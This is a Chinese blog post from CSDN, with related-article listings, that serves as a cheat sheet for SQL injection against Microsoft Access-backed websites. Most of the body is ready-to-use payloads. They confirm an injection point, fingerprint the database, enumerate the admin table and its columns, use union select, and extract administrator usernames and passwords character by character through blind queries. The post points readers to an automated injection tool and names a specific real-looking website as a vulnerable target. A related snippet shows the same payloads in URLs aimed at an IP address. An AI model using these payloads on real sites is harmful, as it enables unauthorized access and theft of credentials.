web安全之Access注入漏洞

最新推荐文章于 2022-10-08 17:47:36 发布
最新推荐文章于 2022-10-08 17:47:36 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43590972/article/details/102557898
版权

Access注入

判断注入点

‘ (报错)

and 1=1 (and前有空格,带入查询,如果返回正常则有漏洞)

and 1=2 (返回错误)

or 1=1 或在id后加-号等等,报错则有漏洞

判断数据库类型

and exsits (select * from msysobjects)>0 (如果存在则是Access数据库)

and exsits (select * from sysobjects)>0

判断数据库是否有admin表

and exists (select * from admin)

如果没有试着尝试 users username password

判断字段名

and exists (select admin from admin) (如果成功说明在admin表里有admin的列名)

and exists (select password from admin)(如果成功说明在admin表里有password的列名)

判断字段长度

order by 10(判断字段长度)

and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
爆出字段后,在相应字段改写成 admin 和password

判断账号密码的长度

and (select top 1 len(列名) from admin)=长度值 如果返回正常说明管理员账户的长度
and (select top 1 len(列名) from admin)>长度值 

判断账号的第一位数据的ascii码

and (select top 1 asc(mid(admin,1,1)) from admin)>100  第一个数据

and (select top 1 asc(mid(admin,2,1)) from admin)<100  第二个数据

先判断一个位置在慢慢尝试 

直接用工具啊D注入

漏洞网站 http://www.jnqtly.cn/

suntx”
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】QQ钓鱼网站实战渗透
m0_46344990的博客
04-14 4502
渗透实战,通过报错注入拿到后台账号密码。
SQL手工注入漏洞测试(Access数据库)
硫酸超的博客
07-29 591
判断注入点 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=2 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=1 猜字段 http://219.153.49.228:48466/new_list.asp?id=1%20order%20by%205 字段数为4
渗透测试之access 注入
四维创智
10-14 612
1. access 数据库简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软O...
BCB使用ACC数据库
liyan的专栏
09-22 1279
 Access数据库在管理中得到了广泛的应用,在长期的使用中已有很多数据资料存储在Access数据库的文件中,用C++ Builder编程时,往往也需要使用Access数据库,来实现数据的传递。 在C++ Builder中使用Access数据库既可以在设计期实现,也可以在运行期通过编程实现。下面就以一个简单的例子,来说明在C++ Builder中如何使用Access数据库。 在设计期使用A
一篇搞懂@Accessors与@Builder(结合项目经验)
幸平的博客
11-03 2507
文章目录前言一、建造者模式(一)、什么是建造者模式(二)、主要作用(三)、模式原理与uml类图二、@Builder(一)、为什么要使用Builder?(二)、@Builder流程分析三、@Accessors(一)、@Accessors流程分析(二)、@Accessors其他字段使用四、项目收获杂谈总结 前言 之前项目有用过@Accessors这个注解,但是没有很好实际的感触到这个注解的好处。前段时间实验室那的公司项目有个场景。让我切身体会到了,固来总结分享一下。 一、建造者模式 在介绍这两个注解之前
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
Web应用安全:SQL注入的辅助性对策.pptx
06-20
- **sqlmap**:这是一个自动化工具,使用Python编写,能自动检测SQL注入漏洞,并支持多种数据库管理系统。 - **Sqlninja**:专门针对使用SQL Server作为后端的系统,旨在提供对易受攻击的数据库服务器的远程访问。...
SQL注入Access注入 (手工)
12-14
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器...
整理比较全的Access SQL注入参考
09-14
2. Burp Suite:一个综合的 Web 应用程序安全测试工具,支持 Access 数据库。 Access SQL 注入的案例 1. 获取数据库版本:使用 UNION SELECT 语句来获取 Access 数据库的版本信息。 2. 获取表名:使用 UNION ...
SQL注入漏洞简单挖掘-01
最新发布
09-15
Web安全领域中,SQL注入漏洞是最常见的漏洞之一,它可以被用来获取敏感数据、控制数据库的行为和执行恶意代码等等。因此,学习SQL注入漏洞的检测和exploit对于我们来说是非常重要的。 本课程提供了一个详细的SQL...
研华Advantech_WebAccess爆出10个0Day漏洞_都属于远程代码执行漏洞
09-08
研华Advantech_WebAccess爆出10个0Day漏洞_都属于远程代码执行漏洞,这些漏洞可以用来做漏洞测试,BroadWin SCADA WebAccess是基于网络浏览器的HMI和SCADA软件,用于工业控制系统和实现自动化。 BroadWin SCADA WebAccess在实现上存在远程代码执行漏洞,成功利用后可允许攻击者在受影响服务器中执行任意代码。
access注入漏洞
weixin_34379433的博客
07-09 331
and exists(select from msysobjects) >0 判断是否为access数据库and exists(select from sysobjects) > 0 判断是否为sql server数据库 and exists(select from admin) 查看是否存在admin表 代表所有,可修改字段名order by 数值 判断字段长度,正常则证明...
Linux(CentOS)下,各种协议,端口号
热门推荐
山不在高,有金则名
07-16 7万+
DNS:/etc/resolv.conf 主机名:/etc/sysconfig/network 私有主机名:/etc/hosts 网卡配置文件存放目录:/etc/sysconfig/network-scripts/ IP/NetMask/Gateway等:/etc/sysconfig/network-scripts/ifcfg-em1 网络协议(IP):/etc/protocols 网
@Builder与@Accessors的优劣对比(搬运)
qq_37807321的博客
06-19 6585
一、对象的创建分法 new Object() 工厂模式 建造者模式 二、优劣性 2.1 直接创建对象 构造方法多个参数时无法明确含义,比如Object(String name, String phone)和Object(String name, String addr) 当参数大于4个时,需要组合所有参数的构造方法,造成代码太大 2.2 使用工厂模式 可以通过定义方法newInstance和getInstance来确定单例还是多例,再则可以通过方法名来区别方法参数 2.3 建造者模式 支持链式表达式 当多
ACCESS:CommandBuilder生成的INSERT语句在ACCESS中总是报错的原因
摩根墓地
02-19 1433
使用CommandBuilder来自动生成Insert Delete Update等语句的时候。 系统总是报错, INSERT INTO 语句的语法错误。    在 System.Data.Common.DbDataAdapter.UpdatedRowStatusErrors(RowUpdatedEventArgs rowUpdatedEvent, BatchCommandI
文件包含漏洞一览
Amire0x的小乐园
11-08 473
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php的文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
TCP常用网络和木马使用端口对照表,常用和不常用端口一览表
weixin_34161032的博客
11-18 1万+
【开始-运行- CMD , 输入 netstat -an 然后回车就可以查看端口】      端口:0   服务:Reserved   说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。      端口:1   服务:tcp...
微软Access数据库出现漏洞,或致8.5万家企业面临风险
数据猿
01-09 433
▼数据猿公告▼数据猿即将推出“2020上半年度大型主题策划活动——我的产品观”,敬请期待!大数据产业创新服务媒体——聚焦数据 · 改变商业新浪科技讯 北京时间1月8日晚间消息,据外媒报...
WEB SQL漏洞-Access、MSSQL(SQL server)注入
m0_61506558的博客
10-08 531
Access->表名->列名->数据,Access数据库保存在网站源码下面,和ASP项目共同存在,自己网站数据库独立存在,所以无法进行跨库,也没有文件读写的操作。
web渗透top10十大漏洞
06-03
1. SQL注入漏洞(SQL Injection):攻击者通过构造恶意的SQL语句,从而绕过身份认证和访问控制等限制,进而获取敏感信息或者执行非法操作。 2. 跨站脚本攻击(Cross-site Scripting,XSS):攻击者通过在受害者的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值